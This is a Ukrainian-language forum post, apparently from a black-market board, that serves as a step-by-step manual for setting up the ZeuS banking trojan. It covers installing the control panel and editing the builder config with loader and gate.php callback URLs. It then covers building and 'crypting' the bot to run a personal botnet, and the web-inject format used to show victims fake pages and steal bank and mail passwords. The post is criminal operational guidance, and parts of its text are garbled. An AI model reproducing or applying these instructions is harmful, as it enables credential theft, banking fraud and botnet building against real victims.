Мануал За ZeuS, Форум, Black Market
๖ۣۜMarcusz
Директор Майкрософту
Приступимо до налаштування: Нам знадобиться хостинг з підтримкою Mysql і PHP Створимо базу даних і перейдемо до встановлення адмінки Перенесемо вміст папки./Zeus sсriрts/Web на наш хостинг і запустимо через браузер інсталятор : http://test1.ru/install/index.php
Control Panel 1.3.2.1 Installer
Root user:User name: (1-20 chars): // Вводимо логін користувача Password (6-64 chars): // Вводимо пароль користувачаMySQL server:Host: // Host Mysql – Зазвичай це localhost User: // Ім'я user бази даних Password: // Пароль user бази даних Database: // Ім'я бази данихLocal folders:Reports:// Назва папки зі звітами, по дефолту коштує _reports Options: Online bot timeout: // Таймаут бота, по дефолту коштує 25 Encryption key (1-255 chars): // Ключ бота, від 1 до 255 латинських символів Enable write reports to database. // Зберігати звіти до бази даних? Enable write reports до локальної мови. // Зберігати звіти до локальної папки (за дефолтом _reports) ? Після введення всіх даних, тиснемо Install і чекаємо установки.
Це означає, що установка завершенаВидаляємо з хостингу папку install вона нам більше не знадобиться Можемо сміливо прямувати до адмінки http://test1.ru/cp.php
Вводимо логін та пароль вказані при встановленні скриптів. І потрапляємо до адмінки
Підлога справи зроблено. Тепер переходимо до налаштування бота ./Zeus sсriрts/Builder 1.2.7.19 Бачимо 4 файли: config.txt // Конфігуратор бота webinjects.txt // Файл зі стандартними інжектами webinjects new.txt // Файл з додатковими інжектами, якщо хочемо скористатися, просто перейменуйте на webinjects txt zsb.exe // Сам білдерZeus Запускаємо білдер, переходимо на вкладку Builder
Білдер сам знайшов шлях до config.txtТиснемо Edit Config:
Тепер починаємо правити під свій хост: 9 рядок - url_config "http://test1.ru/cfg2.bin" - шлях до майбутнього cfg.bin файлу 11 рядок - encryption_key "122122" - Ключ, який ви вводили коли встановлювали скрипти. Якщо забули, то йдемо до адмінки http://test1.ru/cp.php -> Options -> Botnet -> Encryption key:
16 рядок - url_loader "http://test1.ru/bot.exe" - Шлях до майбутнього боту для завантаження 17 рядок - url_server "http://test1.ru/gate.php" - Шлях до gate.php для відстукування бота 18 рядок - file_webinjects "webinjects.txt" – назва файлу з інжектами Після налаштування config.txt зберігаємо і тиснемо Build Config і файл, що створився, нам потрібно залити на хостинг згідно налаштувань. У нашому випадку шлях має бути http://test1.ru/cfg2.bin
Після збереження бачимо BUILD SUCCEEDED! Значить все гуд.Ідемо далі, тиснемо Builder loader і зберігаємо за налаштуваннями, щоб шлях вийшов http://test1.ru/bot.exe
Бачимо Build succeeded!Тепер можемо закрити білдер і запустити бота Відстук можемо побачити в адмінці Для видалення Zeus з вашого комп'ютера (Рекомендую не використовувати комп'ютер для бідла та тестингу Zeus, використовуйте віртуальну машину) запустіть ще раз Bulder і натисніть Remove spyware from this system, у вікні, що з'явилося, тиснемо ОК, після чого перезавантажуємо комп'ютер.
Залишається криптанути, робити завантаження і насолоджуватися особистим ботнетом =)Інжекти для Zeus
- Я новачок у цій справі, розкажи для чого потрібні інжекти? - Уявімо, що ми хочемо зробити собі троян, який краде паролі від банківського рахунку! ну або від звичайної пошти Під кожен веб ресурс нампотрібний свій код інжекта і якщо правильно скласти код введення даних, то жертва отримає фейкову сторінку, а ми тим часом паролі =) І так, робимо свій інжект! Слябзіно зr3al.ПрапориВизначає основну умову завантаження, може складатися з кількох прапорів у будь-якому порядку, але з урахуванням регістру. В даний час доступні такі прапори: P - запускати веб-інжект при запиті POST на URL. G – запускати веб-інжект при GET запиті на URL. L - змінює призначення веб-інжекта, якщо вказати цей прапор, буде отримано потрібний шматок даних і негайно збережений у балку. F - доповнює прапор L, дозволяє записувати результат над лог, а окремий файл. H – доповнює прапор L, зберігає потрібний шматок даних без вирізування тегів. D - запускати веб-інжект раз на 24 години.BlackMask POSTМає маску POST-даних URL, що надсилаються, при яких не запускатиметься веб-інжект.WhiteMask POSTМає маску POST-даних переданих URL, при яких запускатиметься веб-інжект.URLURL, на який повинен спрацьовувати веб-інжект, можна використовувати маску.URL блокуванняУ випадку, якщо ваш веб-інжект повинен завантажуватися лише один раз на комп'ютері жертви, то тут слід вказати маску URL, у разі відкриття якої даний Веб-інжект не буде більше використовуватися на комп'ютер. Якщо вам цього не потрібно, залиште поле порожнім.Mask contextМаска частини вмісту сторінки, при якій повинен спрацювати веб-інжект.
Після вказівки URL, з наступного рядка починається перерахування веб-інжектів, яке триває доти, доки не досягнуто кінця файлу або не задана нова URL за допомогою чергового запису set_url. Один веб-інжект складається з трьох елементів:Без прапораL:data_before - маска даних після яких потрібно записати нові дані. data_after - маска даних, перед якими слід записати нові дані. data_inject - нові дані, на які буде замінено вміст між data_before, data_after.З прапором L:data_before - маска даних після яких починається шматок отриманих даних. data_after - маска даних, перед якими закінчується шматок отриманих даних. data_inject - грає роль заголовка для одержуваних даних, необхідний лише візуального виділення в логах.
Назва елемента повинна починатися з першого байта нового рядка і відразу після закінчення назви має бути перенесення на наступний рядок. З наступного рядка йдуть дані веб-інжекта, закінчення даних позначається рядком data_end, також цей рядок повинен починатися з першого байта чергового рядка. Всередині елемента можна вільно використовувати будь-які символи.Примітки: Як відомо, новий рядок може позначатися одним(0x0A)або двома(0x0D і 0x0A)байтами. Т.к. в основному веб-інжект використовується для заміни вмісту текстових даних, то дана особливість врахована, і бот успішно запускає веб-інжект навіть якщо у вас нові рядки позначені двома байтами, а вмістом URL одним байтом і навпаки. Елементи веб-інжекта може бути розміщені у порядку, тобто. data_before, data_after, data_inject, або data_before, data_inject, data_after і т.д. Елемент може бути порожнім. При використанні прапора L, в отриманих даних кожен тег замінюватиметься на один пробіл.
Приклад файлу: Підміна заголовка будь-якого сайту за протоколом http на фразу "HTTP: Web-Inject"